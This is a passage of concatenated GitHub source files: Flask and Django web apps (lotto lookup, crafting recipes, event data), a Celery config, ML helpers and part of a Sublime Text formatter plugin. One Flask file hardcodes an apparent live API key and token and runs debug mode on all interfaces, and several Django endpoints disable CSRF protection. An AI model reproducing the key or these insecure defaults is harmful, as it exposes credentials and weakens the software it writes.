render_template('pong.html',age_in_html=age)\n\n# 로또번호를 가져와서 보여주는 서버\n@app.route('/lotto_result/')\ndef lotto_result(round):\n url=f'https://www.nlotto.co.kr/common.do?method=getLottoNumber&drwNo={round}'\n result = requests.get(url).json()\n\n winner = []\n for i in range(1,7):\n winner.append(result.get(f'drwtNo{i}')) #.get을 쓰지않고 []를 하면 키가 없을 경우 서버가 에러.\n winner.append(result.get('bnusNo')) \n return json.dumps(winner)\n \napp.run(debug=True)","repo_name":"Yangsiyoung0901/python_server","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41684166546","text":"import torch\n\n\ndef get_reductors(gto, charges, npcas, species):\n \n reductors = {}\n \n for e in species:\n\n indexes = charges == e\n\n sub = gto[indexes]\n \n if (sub.shape[0] == 0):\n continue\n \n perm = torch.randperm(sub.size(0))\n idx = perm[:512]\n\n choice_input = sub[idx]\n \n eigvecs, eigvals, vh = torch.linalg.svd(choice_input.T, full_matrices=False)\n \n cev = 100 - (torch.sum(eigvals) - torch.sum(eigvals[:npcas])) / torch.sum(eigvals) * 100\n \n reductor = eigvecs[:,:npcas]\n size_from = reductor.shape[0]\n size_to = reductor.shape[1]\n \n print (f\"{size_from} -> {size_to} Cumulative Explained Feature Variance = {cev:6.2f} %%\")\n \n reductors[e] = reductor\n \n return reductors\n\n\ndef project_representation(X, reductor):\n \n '''\n \n projects the representation from shape: \n nsamples x repsize \n to \n nsamples x npcas\n \n '''\n \n return torch.matmul(X, reductor)\n\n\ndef project_derivative(dX, reductor):\n '''\n \n projects the representation derivative from shape:\n \n nsamples x natoms x 3 x repsize \n to \n nsamples x natoms x 3 x npcas\n \n '''\n\n return torch.einsum('jmnk, kl->jmnl', dX, reductor)\n","repo_name":"nickjbrowning/qml-lightning","sub_path":"qml_lightning/representations/dimensionality_reduction.py","file_name":"dimensionality_reduction.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"75"} +{"seq_id":"41187366741","text":"import json\nfrom apiclient.discovery import build\n\nAPPLICATION_NAME = 'ZooDel'\nSERVICE = build('plus', 'v1')\n\nPPS_STRUCT = 'pps'\nPOS_TAGS = 'pps_pos_tags'\nUSERS = 'users'\nMAIN_PPS = 'main_pps'\nKEYS = 'user_doc_key'\nPERSIST = 'persistent'\nYES = 'YES'\nNO = 'NO'\nPHI = '0'\nCURSOR_POS = 'cursor_pos'\nCURSOR_COLOR = 'cursor_color'","repo_name":"saitejar/colabedit","sub_path":"app/model/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1129193934","text":"from __future__ import absolute_import\nfrom celery.schedules import crontab\n\nbroker_url = \"redis://127.0.0.1:6379/5\"\nresult_backend = \"redis://127.0.0.1:6379/6\"\n\ntask_serializer = 'json'\nresult_serializer = 'json'\naccept_content = ['json']\ntimezone = \"Asia/Shanghai\" # 时区设置\nworker_hijack_root_logger = False # celery默认开启自己的日志,可关闭自定义日志,不关闭自定义日志输出为空\nresult_expires = 60 * 60 * 24 # 存储结果过期时间(默认1天)\n\n# 导入任务所在文件\nimports = [\n \"celery_task.epp_scripts.spider_task\", # 导入py文件\n]\n\n\n# 需要执行任务的配置\nbeat_schedule = {\n \"ip_spider\": {\n \"task\": \"celery_task.epp_scripts.spider_task.ip_spider\", # 执行的函数\n \"schedule\": crontab(minute=0, hour=0), # 每天凌晨12点\n \"args\": () # 任务函数参数\n },\n}\n","repo_name":"Lknj/IpPool","sub_path":"celery_task/celery_config.py","file_name":"celery_config.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"11994741610","text":"from django.http import HttpResponse\nfrom craftapp.models import Recipe, Machine, Slotdata, Item, ByProducts\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nfrom django.shortcuts import get_object_or_404\nimport numpy as np\nimport pandas as pd\nfrom collections import Counter\nfrom collections import OrderedDict\nfrom math import ceil\nfrom itertools import product\n\ndef key_format(key):\n if type(key) == int:\n return str(key)\n else:\n return '\"{}\"'.format(str(key))\n\ndef dict_to_lua(input):\n if type(input) in {float, int, np.int64}:\n return str(input)\n elif type(input) == bool:\n return str(input).lower()\n elif type(input) == str:\n return '\"{}\"'.format(str(input))\n elif type(input) == dict:\n if len(input) == 0:\n return '{}'\n else:\n return '{' + ', '.join([ '[{}] = {}'.format(key_format(key), dict_to_lua(value)) for (key, value) in input.items()]) + '}'\n else:\n assert(False), \"Cannot process \" + str(type(input)) + \" (datatypes other than dict of dict with literals)\"\n\ndef find_or_create_item(item_dict):\n try:\n item = Item.objects.get(item_id = item_dict['id'])\n except Item.DoesNotExist:\n item = Item.objects.create(\n item_id = item_dict['id'],\n display_name = item_dict['display_name'],\n max_stack = item_dict['stack_size']\n )\n return item\n\n# revamped = YES\ndef index(request):\n return HttpResponse(\"Hello, world. You're on the beautiful craftapp front page.\")\n\n# revamped: YES\ndef get_machines(request):\n return HttpResponse('\\n'.join(Machine.objects.all().values_list('name', flat = True)), content_type = 'text/plain')\n\n# revamped: YES\n@csrf_exempt\ndef add_machine(request):\n if request.method == 'POST':\n if not type(request.body) == bytes:\n return HttpResponse(status = 400)\n new_machine = request.body.decode('UTF-8')\n if len(Machine.objects.filter(name = new_machine)) == 0:\n Machine.objects.create(name = new_machine)\n return HttpResponse('Added to database!')\n else:\n return HttpResponse(str(new_machine) + ' already in database!')\n else:\n return HttpResponse(status = 400)\n\n# revamped: YES\n@csrf_exempt\ndef new_alias(request):\n if request.method == 'POST':\n if not type(request.body) == bytes:\n return HttpResponse(status = 400)\n alias_str = request.body.decode('UTF-8')\n machines_list = [get_object_or_404(Machine, name = machinename) for machinename in alias_str.split(',')]\n if not len(machines_list) == 2:\n print('Add alias HTTP request must have two arguments.')\n return HttpResponse(status = 400)\n \n machines_list[0].add_alias(machines_list[1])\n machines_list[1].add_alias(machines_list[0]) \n\n return HttpResponse('Success')\n else:\n return HttpResponse(status = 400)\n\n# revamped = YES\ndef get_recipe_names(request):\n names = Recipe.objects.all().values_list('recipe_name__display_name',flat = True).distinct()\n return HttpResponse('\\n'.join(names), content_type = 'text/plain')\n\n# revamped = YES\ndef recipe_func(request, recipeid):\n r = get_object_or_404(Recipe, pk = recipeid)\n output_dict = {\n 'recipe_name' : r.recipe_name.item_id,\n 'display_name' : r.recipe_name.display_name,\n 'makes' : r.makes,\n 'has_byproducts' : len(r.byproducts_set.all()) > 0,\n 'is_shapeless' : r.is_shapeless,\n 'max_stack' : r.recipe_name.max_stack,\n 'min_maxstack' : r.min_maxstack()\n }\n \n output_dict['slotdata'] = {\n slotnum : {'item':slot.item.item_id, 'quantity' : slot.quantity} for slot in r.slotdata_set.all() for slotnum in slot.slots.split(',')\n }\n\n output_dict['by_products'] = {\n item : quantity for (item, quantity) in r.byproducts_set.all()\n }\n \n output_dict['machine_with'] = {\n i + 1 : machine.name for (i, machine) in enumerate([r.machine_with, *r.machine_with.aliases.all()])\n } \n\n output_dict['is_crafted'] = output_dict['machine_with'][1] == 'Crafter'\n\n return HttpResponse(dict_to_lua(output_dict), content_type = 'text/plain')\n\n# revamped: YES\n@csrf_exempt\ndef add_recipe(request):\n if request.method == 'POST':\n \n if not type(request.body) == bytes:\n return HttpResponse(status = 400)\n \n valid_post_keys = ['recipe_name', 'machine_with', 'makes', 'is_shapeless', 'slotdata', 'by_products']\n recipedata = json.loads(request.body)\n\n if not all([key in recipedata.keys() for key in valid_post_keys]):\n return HttpResponse(status = 400)\n \n try:\n machine = Machine.objects.get(name = recipedata['machine_with'])\n except Machine.DoesNotExist:\n machine = Machine.objects.create(name = recipedata['machine_with'])\n \n output_item = find_or_create_item(recipedata['recipe_name'])\n \n #create slot tuples in format (itemname, mod, slot, quantity)\n slot_tuples = set([\n (find_or_create_item(x['item']).id, int(slot), x['quantity']) for slot, x in recipedata['slotdata'].items()\n ])\n #check for dups\n for recipe in output_item.recipe_set.all():\n recipe_set = recipe.get_slotdata_tuples()\n if len(slot_tuples) == len(recipe_set) == len(recipe_set & slot_tuples):\n return HttpResponse('Duplicate recipe')\n \n slotdata_df = pd.DataFrame(slot_tuples, columns = ['item','slot','quantity'])\n pre_slotdata_df = slotdata_df.groupby(['item','quantity']).agg(lambda x : list(x))\n \n newRecipe = Recipe.objects.create(\n recipe_name = output_item,\n makes = recipedata['makes'],\n machine_with = machine,\n is_shapeless = recipedata['is_shapeless'])\n\n for (index, row) in pre_slotdata_df.iterrows():\n newRecipe.slotdata_set.create(\n slots = ','.join([str(x) for x in row.values[0]]),\n item = Item.objects.get(pk = index[0]),\n quantity = index[1]\n )\n \n for byproducts_dict in recipedata['by_products'].values():\n new_item = find_or_create_item(byproducts_dict['item'])\n newRecipe.byproducts_set.create(item = new_item, quantity = byproducts_dict['quantity'])\n \n return HttpResponse('Added to database!')\n else:\n return HttpResponse(status = 400)\n\n#revamped: YES\ndef instructions(request):\n if not request.method == 'GET':\n print('Request for instructions did not include GET method')\n return HttpResponse(status = 400)\n \n try:\n if not 'HTTP_INVENTORY' in request.META:\n inventory = Counter()\n else:\n inventory = Counter(json.loads(request.META['HTTP_INVENTORY']))\n \n if not 'HTTP_MACHINES' in request.META:\n machines = set()\n else:\n machines = set([machine_name for color, machine_name in json.loads(request.META['HTTP_MACHINES']).items()])\n \n recurse_item = get_object_or_404(Item, display_name = request.GET['for'])\n inventory[recurse_item.item_id] = 0\n tree_summary = Item_Node(recurse_item, int(request.GET['quantity']), inventory, set(), machines)\n except:\n return HttpResponse(status == 500)\n #write methods for tree_summary printing\n return HttpResponse(tree_summary.lua_output(), content_type = 'text/plain')\n\n\nclass OrderedCounter(Counter, OrderedDict):\n #'Counter that remembers the order elements are first encountered'\n def __repr__(self):\n return '%s(%r)' % (self.__class__.__name__, OrderedDict(self))\n\n def __reduce__(self):\n return self.__class__, (OrderedDict(self),)\n\n def __str__(self):\n return '{' + ', '.join(['{}: {}'.format(key,value) for key, value in self.items()]) + '}'\n\n\ndef Item_Node(item, order_quantity, available_resources = Counter(), parent_set = set(), machines = set()):\n \n #print('Enter name node: ', search_name)\n # define an order for this name node\n order = Craft_Order()\n parent_set.add(item.item_id)\n # if there is this stuff in the inventory, subtract\n recipe_options = item.recipe_set.all()\n\n if available_resources[item.item_id] >= order_quantity:\n available_resources[item.item_id] -= order_quantity\n order.used_resources[item.item_id] += order_quantity\n return order\n else:\n # else decrement the order quanitity and continue\n num_availabe = available_resources[item.item_id]\n if len(recipe_options) == 0:\n order.missing_resources[item.item_id] += order_quantity - num_availabe\n order.is_leaf = True\n order.used_resources = Counter()\n return order\n else:\n order.used_resources[item.item_id] += num_availabe\n available_resources[item.item_id] = 0\n order_quantity -= num_availabe\n\n # else add leaves \n children = [\n Recipe_Node(recipe, order_quantity, available_resources.copy(),parent_set.copy(), machines)\n for recipe in recipe_options\n ]\n \n score_columns = ['machines_attached', 'missing_resources','used_resources','num_steps']\n #print(*[craftorder.score() for craftorder in children])\n score_df = pd.DataFrame([craftorder.score() for craftorder in children], columns = score_columns)\n score_df.sort_values(score_columns, inplace = True)\n\n #print(str(score_df))\n\n return Craft_Order.union([children[score_df.iloc[0].name], order])\n\ndef Recipe_Node(recipe, order_quantity, available_resources, parent_set, machines):\n\n #print('Enter recipe node: ', recipe_name)\n #print(parent_set)\n # instantiate a craftorder for this recipe\n this_order = Craft_Order()\n # query to obtain recipe\n recipe_data = recipe.slotdata_set.all()\n \n #if no recipe, add to missing\n if len(recipe_data) == 0:\n this_order.missing_resources[recipe.recipe_name.item_id] = order_quantity\n return this_order\n \n #recipe = pd.DataFrame(db_recipe_data, columns = ['slot','item','quantity'])\n \n # check for cycles\n if len(parent_set & set(recipe_data.values_list('item__item_id', flat = True))) > 0:\n #print('recipe name: ', recipe_name)\n #print(*zip(recipe['item'].values, [parent_name in parent_set for parent_name in recipe['item'].values]))\n this_order.missing_resources[recipe.recipe_name.item_id] = order_quantity\n return this_order\n\n # adjust for makes, stuff like that\n num_operations_required = ceil(order_quantity / recipe.makes)\n # for each component, grouped:\n children = []\n #for (component_name, num_required) in recipe[['item','quantity']].groupby('item').sum().iterrows():\n for slot_info in recipe_data:\n # new node for every component type\n subtree_order = Item_Node(slot_info.item, slot_info.quantity * (len(slot_info.slots) + 1)/2 * num_operations_required, available_resources.copy(), parent_set)\n # subtract used resources from the pool of available resources\n available_resources -= subtree_order.used_resources\n # add the child node\n children.append(subtree_order)\n \n # consolidate the craftorders with this order\n this_order = Craft_Order.union([*children, this_order])\n\n # if this crafting is successful, add a step, if not\n if this_order.can_craft():\n # compensate for overflow\n overflow = (recipe.makes * num_operations_required) - order_quantity\n this_order.used_resources[recipe.recipe_name.item_id] = -1 * overflow\n # add the step\n this_order.add_step(recipe.id, num_operations_required)\n this_order.has_all_machines = recipe.machine_with.name == 'Crafter' or len(set(recipe.machine_with.all_possible_machines()) & machines) > 0\n return this_order\n\nclass Craft_Order:\n def __init__(self):\n self.used_resources = Counter()\n self.missing_resources = Counter()\n self.queue = OrderedCounter()\n self.is_leaf = True\n self.has_all_machines = True\n\n def add_step(self, execute_id, quantity):\n self.queue[execute_id] += quantity\n self.is_leaf = False\n \n @staticmethod\n def union(orders):\n sum_order = Craft_Order()\n for order in orders:\n sum_order.used_resources += order.used_resources\n sum_order.missing_resources += order.missing_resources\n sum_order.queue += order.queue\n sum_order.has_all_machines = sum_order.has_all_machines & order.has_all_machines\n return sum_order\n\n def can_craft(self):\n return sum(self.missing_resources.values()) == 0\n \n def get_summary(self):\n return self.queue\n\n def score(self):\n return (not self.has_all_machines, sum(self.missing_resources.values()),sum(self.used_resources.values()), len(self.queue))\n\n # implement!\n def lua_output(self):\n output_dict = {\n 'missing_resouces': {\n Item.objects.get(item_id = item_rawname).display_name : quantity for (item_rawname, quantity) in self.missing_resources.items()\n },\n 'craft_queue' : {\n i + 1 : {'id' : recipe_id, 'quantity' : self.queue[recipe_id], 'name' : Recipe.objects.get(pk = recipe_id).recipe_name.item_id} for i, recipe_id in enumerate(self.queue)\n },\n 'resources_used': dict(self.used_resources),\n }\n return dict_to_lua(output_dict)\n\n def __str__(self):\n new_dict = {\n str(key) : val for (key,val) in self.queue.items()\n }\n return counter_pretty_print(new_dict, 'Queue') +'\\n' + counter_pretty_print(self.used_resources,'Used') + '\\n' + counter_pretty_print(self.missing_resources, 'Missing')\n\n\ndef counter_pretty_print(counter,title):\n if len(counter) == 0:\n return title + ':\\nNone\\n'\n output = title + ':\\n--{:-<30}---{:-^5}--\\n'.format('Item','Num')\n for (key, val) in counter.items():\n output += '| {:30} | {:>5} |\\n'.format(str(key),str(val))\n output += '-'*42\n return output + '\\n'","repo_name":"AllenWLynch/craft_server","sub_path":"craftapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30482363637","text":"from flask import Flask,render_template,request,url_for,jsonify,json\nimport unirest\napp = Flask(__name__)\n\nheaders={\"X-Mashape-Key\": \"UJufyI4Lj9mshuzkxbrZcqcIBUgOp1DgxfejsnqnsqaDWhwGzL\",\"Accept\": \"application/json\"}\ntoken=\"34272aa31x1a6776666a\"\n@app.route(\"/\",methods=['GET','POST'])\ndef modal_details(region):\n with open ('data/model.json') as f:\n data = json.loads(f.read())\n data=json.dumps(data)\n return data\n\n@app.route(\"//\",methods=['GET','POST'])\ndef event_detail(region,event_id):\n with open ('data/model.json') as f:\n data = json.loads(f.read())\n for i in data:\n if i[\"event_id\"]==event_id:\n return jsonify(i)\n return \"event_id not found\"\n\n@app.route(\"/mapinfo\",methods=['GET','POST'])\ndef map_info():\n with open ('data/mapinfo.json') as f:\n data = json.loads(f.read())\n return data\n\n\n\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run(host='0.0.0.0')\n","repo_name":"rahulyadav170923/fhacking_eventhub","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21365913366","text":"# -*- coding: utf-8 -*-\n\nfrom context import mlp, svm\n\nimport unittest, numpy, pandas\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\n\nclass IrisTestSuite(unittest.TestCase):\n \"\"\"Suíte de testes para MLP e SVM utilizando conjunto de dados iris.\"\"\"\n\n def test_iris(self):\n \"\"\"Treina um MLP e um SVM para classificação do conjunto de dados iris.\"\"\"\n\n # Lê arquivo de dados\n dataset = pandas.read_csv('../datasets/iris/iris.data', sep=',')\n X = dataset.ix[:, dataset.columns != 'class'].to_dict(orient='records')\n y = dataset.ix[:, dataset.columns == 'class'].as_matrix()[:,0]\n\n vectorizer = DictVectorizer(sparse = False)\n X = vectorizer.fit_transform(X)\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25)\n\n classifier = mlp.MLP(hidden_layer_size=10)\n classifier.fit(X_train, y_train)\n y_pred = classifier.predict(X_test)\n print(classification_report(y_test, y_pred))\n\n classifier = svm.SVM(kernel='linear', C=1)\n classifier.fit(X_train, y_train)\n y_pred = classifier.predict(X_test)\n print(classification_report(y_test, y_pred))\n\n assert True\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"fberanizo/sin5016","sub_path":"tests/test_iris.py","file_name":"test_iris.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8237040183","text":"import hashlib\nimport logging\nimport os\nimport re\nimport sys\nimport tempfile\nimport sublime\nif sys.version_info < (3, 4):\n from imp import reload\nelse:\n from importlib import reload\nfrom subprocess import Popen, PIPE\nfrom os.path import (basename, expanduser, expandvars, isdir, isfile, join,\n exists, normcase, normpath, pathsep, split, splitext, dirname)\n\nlog = logging.getLogger(__name__)\n\nIS_WINDOWS = sublime.platform() == 'windows'\nPACKAGE_NAME = 'Formatter'\nASSETS_DIRECTORY = 'formatter.assets'\nRECURSIVE_SUCCESS_DIRECTORY = '__format_success__'\nRECURSIVE_FAILURE_DIRECTORY = '__format_failure__'\nSTATUS_KEY = '@!' + PACKAGE_NAME.lower()\n\nLAYOUTS = {\n 'single': {\n 'cols': [0.0, 1.0],\n 'rows': [0.0, 1.0],\n 'cells': [[0, 0, 1, 1]]\n },\n '2cols': {\n 'cols': [0.0, 0.5, 1.0],\n 'rows': [0.0, 1.0],\n 'cells': [[0, 0, 1, 1], [1, 0, 2, 1]]\n },\n '2rows': {\n 'cols': [0.0, 1.0],\n 'rows': [0.0, 0.5, 1.0],\n 'cells': [[0, 0, 1, 1], [0, 1, 1, 2]]\n }\n}\n\n\ndef generate_ascii_tree(reloaded_modules, package_name):\n tree = {}\n\n for module in reloaded_modules:\n parts = module.split('.')\n current_node = tree\n for part in parts:\n current_node = current_node.setdefault(part, {})\n\n def print_tree(node, prefix):\n sorted_keys = sorted(node.keys())\n for i, key in enumerate(sorted_keys):\n is_last = i == len(sorted_keys) - 1\n print(prefix + ('└── ' if is_last else '├── ') + key)\n print_tree(node[key], prefix + (' ' if is_last else '│ '))\n\n print(package_name)\n print_tree(tree[package_name], '')\n\ndef reload_modules():\n reloaded_modules = []\n modules_copy = dict(sys.modules)\n for module_name, module in modules_copy.items():\n if module_name.startswith(PACKAGE_NAME + '.') and module:\n reloaded_modules.append(module_name)\n try:\n reload(module)\n except Exception as e:\n log.error('Error reloading module %s: %s', module_name, str(e))\n return None\n log.debug('Reloaded modules (Python %s):', '.'.join(map(str, sys.version_info[:3])))\n generate_ascii_tree(reloaded_modules, PACKAGE_NAME)\n\ndef config_file():\n return PACKAGE_NAME + '.sublime-settings'\n\ndef get_config():\n settings = sublime.load_settings(config_file())\n settings.add_on_change('@reload@', load_config)\n build_config(settings)\n\ndef load_config():\n settings = sublime.load_settings(config_file())\n build_config(settings)\n\ndef build_config(settings):\n global config\n\n # Sublime settings dict is immutable and unordered\n config = {\n 'debug': settings.get('debug', False),\n 'dev': settings.get('dev', False),\n 'open_console_on_failure': settings.get('open_console_on_failure', False),\n 'show_statusbar': settings.get('show_statusbar', True),\n 'layout': {\n 'enable': query(settings, False, 'layout', 'enable'),\n 'sync_scroll': query(settings, False, 'layout', 'sync_scroll')\n },\n 'environ': settings.get('environ', {}),\n 'formatters': settings.get('formatters', {})\n }\n config['formatters'].pop('example', None)\n config = recursive_map(expand_path, config)\n return config\n\ndef assign_layout(layout):\n return LAYOUTS.get(layout, None)\n\ndef want_layout():\n return query(config, False, 'layout', 'enable') in LAYOUTS\n\ndef setup_layout(view):\n layout = query(config, False, 'layout', 'enable')\n if layout in LAYOUTS:\n view.window().set_layout(assign_layout(layout))\n return True\n return False\n\ndef recursive_map(func, data):\n if isinstance(data, dict):\n return dict(map(lambda item: (item[0], recursive_map(func, item[1])), data.items()))\n elif isinstance(data, list):\n return list(map(lambda x: recursive_map(func, x), data))\n else:\n return func(data)\n\ndef update_environ():\n try:\n environ = os.environ.copy()\n for key, value in config.get('environ').items():\n if value and isinstance(value, list):\n pathstring = environ.get(key, None)\n items = list(filter(None, value))\n if items:\n if pathstring:\n paths = pathstring.split(pathsep)\n [i if normpath(i) in paths else paths.insert(0, normpath(i)) for i in reversed(items)]\n environ[key] = pathsep.join(paths)\n else:\n environ[key] = pathsep.join(map(normpath, items))\n return environ\n except Exception as error:\n log.warning('Could not clone system environment: %s', error)\n return None\n\ndef setup_shared_config_files():\n src = 'Packages/' + PACKAGE_NAME + '/config'\n dst = join(sublime.packages_path(), 'User', ASSETS_DIRECTORY, 'config')\n\n try:\n os.makedirs(dst, exist_ok=True)\n except OSError as e:\n if e.errno != os.errno.EEXIST:\n log.warning('Could not create directory: %s', dst)\n return None\n\n if not isdir(dst):\n log.warning('Could not create directory: %s', dst)\n return None\n\n for resource in sublime.find_resources('*'):\n if resource.startswith(src):\n file = basename(resource)\n path = join(dst, file)\n if isfile(path):\n try:\n res = sublime.load_binary_resource(resource)\n hash_src = hashlib.md5(res).hexdigest()\n hash_dst = md5f(path)\n master_path = '{0}.{2}{1}'.format(*splitext(path) + ('master',))\n hash_dst_master = md5f(master_path) if isfile(master_path) else None\n\n if not hash_dst_master or (hash_dst_master and hash_src != hash_dst_master):\n with open(master_path, 'wb') as f:\n f.write(res)\n log.debug('Setup shared master config: %s', master_path)\n except Exception as e:\n log.warning('Could not setup shared master config: %s\\n%s', master_path, e)\n else:\n try:\n res = sublime.load_binary_resource(resource)\n with open(path, 'wb') as f:\n f.write(res)\n log.debug('Setup shared config: %s', path)\n except Exception as e:\n log.warning('Could not setup shared config: %s\\n%s', path, e)\n return True\n\ndef md5f(fname):\n hash_md5 = hashlib.md5()\n with open(fname, 'rb') as f:\n for chunk in iter(lambda: f.read(8192), b''):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n\ndef get_pathinfo(path):\n try:\n cwd = tempfile.gettempdir()\n except AttributeError:\n # Fallback to ${HOME} for unsaved buffer\n cwd = expanduser('~')\n base = stem = suffix = ext = None\n if path:\n cwd, base = split(path)\n stem, suffix = splitext(base)\n ext = suffix[1:]\n return {'path': path, 'cwd': cwd, 'base': base, 'stem': stem, 'suffix': suffix, 'ext': ext}\n\ndef exec_cmd(cmd, cwd):\n info = None\n if IS_WINDOWS:\n from subprocess import STARTUPINFO, STARTF_USESHOWWINDOW, SW_HIDE\n # Hide the console window to avoid flashing an\n # ugly cmd prompt on Windows when invoking plugin.\n info = STARTUPINFO()\n info.dwFlags |= STARTF_USESHOWWINDOW\n info.wShowWindow = SW_HIDE\n\n # Input cmd must be a list of strings\n process = Popen(cmd, stdout=PIPE, stdin=PIPE, stderr=PIPE, cwd=cwd,\n env=update_environ(), shell=IS_WINDOWS, startupinfo=info)\n return process\n\ndef query(data_dict, default=None, *keys):\n for key in keys:\n if not isinstance(data_dict, (dict, sublime.Settings)):\n return default\n data_dict = data_dict.get(key, default)\n return data_dict\n\ndef is_view(file_or_view):\n return (type(file_or_view) is sublime.View)\n\ndef is_text_data(data):\n try:\n data = data.decode('utf-8')\n return data\n except (UnicodeDecodeError, AttributeError):\n return False\n\ndef is_text_file(file_path):\n try:\n with open(file_path, 'r', encoding='utf-8') as f:\n next(f)\n return True\n except UnicodeDecodeError:\n return False\n\ndef run_once(func):\n def wrapper(*args, **kwargs):\n if not wrapper.has_run:\n wrapper.has_run = True\n return func(*args, **kwargs)\n wrapper.has_run = False\n\n def reset_run():\n wrapper.has_run = False\n wrapper.reset_run = reset_run\n return wrapper\n\ndef get_unique(data):\n if isinstance(data, list):\n unique_list = []\n for item in data:\n if item not in unique_list:\n unique_list.append(item)\n return unique_list\n elif isinstance(data, dict):\n unique_keys = []\n unique_values = []\n unique_dict = {}\n for key, value in data.items():\n if key not in unique_keys and value not in unique_values:\n unique_keys.append(key)\n unique_values.append(value)\n unique_dict[key] = value\n return unique_dict\n else:\n raise ValueError('Input data type not supported')\n\ndef get_recursive_filelist(dir, exclude_dirs_regex, exclude_files_regex, exclude_extensions):\n text_files = []\n for root, dirs, files in os.walk(dir):\n dirs[:] = [d for d in dirs if not any(re.match(pattern, d) for pattern in exclude_dirs_regex) and d not in [RECURSIVE_SUCCESS_DIRECTORY, RECURSIVE_FAILURE_DIRECTORY]]\n for file in files:\n p = get_pathinfo(file)\n if p['ext'] in exclude_extensions or not p['ext'] and p['base'] == p['stem'] and p['stem'] in exclude_extensions:\n continue\n if any(re.match(pattern, file) for pattern in exclude_files_regex):\n continue\n file_path = join(root, file)\n if is_text_file(file_path):\n text_files.append(file_path)\n return text_files\n\ndef expand_path(path):\n if path and isinstance(path, str):\n variables = sublime.active_window().extract_variables()\n path = sublime.expand_variables(path, variables)\n path = normpath(expanduser(expandvars(path)))\n # log.debug('Normalized path: %s', path)\n return path\n\ndef is_exe(file):\n if file and isinstance(file, str) and exists(file) and isfile(file):\n if os.access(file, os.F_OK | os.X_OK):\n return True\n if not IS_WINDOWS:\n import stat\n os.chmod(file, os.stat(file).st_mode | stat.S_IEXEC)\n log.debug('Set executable permission for: %s', file)\n return True\n log.warning('File exists but cannot be executed: %s', file)\n return False\n\ndef get_environ_path(fnames):\n if fnames and isinstance(fnames, list):\n environ = update_environ()\n if environ and isinstance(environ, dict):\n path = environ.get('PATH', os.defpath)\n if path:\n dirs = path.split(pathsep)\n if IS_WINDOWS:\n pathext = os.environ.get('PATHEXT', '').split(pathsep)\n final = [[fn, ext] for fn in fnames for ext in pathext if any([fn.lower().endswith(ext.lower())])]\n if final:\n files = [final[0][0]]\n else:\n files = [fn + ext for fn in fnames for ext in pathext]\n else:\n files = fnames\n seen = set()\n for dir in dirs:\n normdir = normcase(dir)\n if not normdir in seen:\n seen.add(normdir)\n for thefile in files:\n file = join(dir, thefile)\n if is_exe(file):\n return file\n else:\n log.error('\"PATH\" or default search path does not exist: %s', path)\n else:\n log.error('System environment is empty or not of type dict: %s', environ)\n else:\n log.error('File names variable is empty or not of type list: %s', fnames)\n return None\n\ndef get_head_cmd(uid, intr_names, exec_names):\n interpreter = get_runtime_path(uid, intr_names, 'interpreter')\n executable = get_runtime_path(uid, exec_names, 'executable')\n if not interpreter or not executable:\n return None\n cmd = [interpreter, executable]\n args = get_args(uid)\n if args:\n cmd.extend(args)\n return cmd\n\ndef get_runtime_path(uid, fnames, path_type):\n if path_type not in ['interpreter', 'executable']:\n log.error('Invalid runtime type. Either use the keyword \"interpreter\" or \"executable\".')\n return None\n\n local_file = query(config, None, 'formatters', uid, path_type + '_path')\n if local_file and not isfile(local_file):\n log.error('File does not exist: %s', local_file)\n return None\n if is_exe(local_file):\n log.debug('%s: %s', path_type.capitalize(), local_file)\n return local_file\n global_file = get_environ_path(fnames)\n if global_file:\n return global_file\n log.error('Could not find %s: %s', path_type, fnames)\n return None\n\ndef get_config_path(view, uid, region, is_selected):\n shared_config = query(config, None, 'formatters', uid, 'config_path')\n if shared_config and isinstance(shared_config, dict):\n syntax = get_assigned_syntax(view, uid, region, is_selected)\n for key, path in shared_config.items():\n if key.strip().lower() == syntax and path and isinstance(path, str) and isfile(path) and os.access(path, os.R_OK):\n log.debug('Config [%s]: %s', syntax, path)\n return path\n default_path = shared_config.get('default', None)\n if default_path and isinstance(default_path, str) and isfile(default_path) and os.access(default_path, os.R_OK):\n log.debug('Config [default]: %s', default_path)\n return default_path\n log.warning('Could not obtain config file for syntax: %s', syntax)\n log.warning('Default core config will be used instead if any.')\n return None\n log.warning('Setting key \"config_path\" is empty or not of type dict: %s', shared_config)\n log.warning('Default core config will be used instead if any.')\n return None\n\ndef get_assigned_syntax(view, uid, region, is_selected):\n syntaxes = query(config, None, 'formatters', uid, 'syntaxes')\n if syntaxes and isinstance(syntaxes, list):\n syntaxes = list(map(str.lower, filter(None, syntaxes)))\n scopes = view.scope_name(0 if not is_selected else region.a).strip().lower().split(' ')\n for syntax in syntaxes:\n for scope in scopes:\n if 'source.' + syntax + '.embedded' in scope:\n return syntax\n if 'source.' + syntax == scope:\n return syntax\n for syntax in syntaxes:\n for scope in scopes:\n if scope.endswith('.' + syntax):\n return syntax\n for syntax in syntaxes:\n for scope in scopes:\n if '.' + syntax + '.' in scope:\n return syntax\n for syntax in syntaxes:\n for scope in scopes:\n if scope.startswith(syntax + '.'):\n return syntax\n return None\n log.error('Setting key \"syntaxes\" may not be empty and must be of type list: %s', syntaxes)\n return None\n\ndef get_args(uid):\n args = 